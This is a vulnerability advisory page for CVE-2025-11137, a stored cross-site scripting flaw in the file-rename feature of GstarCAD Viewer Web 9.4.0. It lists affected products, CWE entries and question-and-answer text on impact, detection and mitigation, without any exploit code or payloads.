CVE-2025-11137
BaseFortify
Publication date: 2025-09-29
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| gstarsoft | gstarcad | 9.4.0 |
| gstarsoft | gstarcad_viewer_web | 9.4.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-11137 is a stored cross-site scripting (XSS) vulnerability in Gstarsoft GstarCAD Viewer Web version 9.4.0, specifically in the file renaming feature. An attacker can inject malicious JavaScript code into the file name field, which is then stored on the server. When the application displays the file list or the renamed file, the malicious script executes in the victim's browser. This allows attackers to steal sensitive information like cookies and session tokens, perform unauthorized actions on behalf of users, and cause persistent account compromise. The vulnerability can be exploited remotely and requires user interaction. [1, 2]
How can this vulnerability impact me? :
This vulnerability can impact you by allowing attackers to execute malicious scripts in your browser when viewing renamed files. This can lead to theft of sensitive information such as cookies and session tokens, unauthorized actions performed on your behalf, and persistent compromise of user accounts. Additionally, if a maliciously renamed file is shared, other users who open the file are also at risk, broadening the attack's impact. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection can be performed by monitoring for suspicious or malicious JavaScript code injected into file names handled by the GstarCAD Viewer Web version 9.4.0, particularly in the file renaming feature. Since the vulnerability involves stored cross-site scripting (XSS), inspecting web application logs or file rename requests for unusual script tags or payloads may help. Additionally, using web vulnerability scanners that detect XSS in web applications could identify this issue. Specific commands are not provided in the resources. [1, 2]
What immediate steps should I take to mitigate this vulnerability?
The immediate recommended action is to apply the official patch provided by Gstarsoft Co., Ltd. for GstarCAD up to version 9.4.0 to fix the vulnerability. Until the patch is applied, restrict access to the file renaming functionality if possible, and educate users to be cautious when opening shared files or links that may contain malicious payloads. Monitoring and filtering inputs to the file renaming handler to prevent script injection can also help mitigate risk. [1, 2]